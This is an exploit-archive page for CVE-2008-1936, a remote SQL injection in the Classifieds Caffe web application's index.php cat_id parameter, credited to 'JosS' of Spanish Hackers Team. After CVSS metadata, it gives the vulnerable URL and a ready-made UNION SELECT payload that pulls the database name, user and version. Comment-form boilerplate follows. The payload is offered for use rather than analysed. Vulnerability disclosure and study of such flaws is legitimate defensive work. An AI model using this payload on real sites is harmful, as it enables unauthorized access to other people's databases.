Classifieds Caffe (index.php cat_id) Remote SQL Injection

2008.04.24

Credit: JosS

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2008-1936

CWE: CWE-89

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--

--==+               Classifieds Caffe (index.php cat_id) Remote SQL Injection            +==--

--==+===================================================================
=================+==--

[+] [JosS] + [Spanish Hackers Team] + [Sys - Project]

[+] Info:

[~] Software: Classifieds Caffe

[~] Exploit: Remote SQL Injection [High]

[~] Where: index.php

[~] Bug Found By: JosS

[~] Contact: sys-project[at]hotmail.com

[~] Web: http://www.spanish-hackers.com

[+] Exploit:

[~] /index.php?action=add&cat_id=[SQL]

[~] 7'+union+all+select+0,1,convert(concat(database(),char(58),user(),char(5
8),version()),char),3/*

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--

--==+                                       JosS                                         +==--

--==+===================================================================
=================+==--

[+] [The End]

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Classifieds Caffe (index.php cat_id) Remote SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.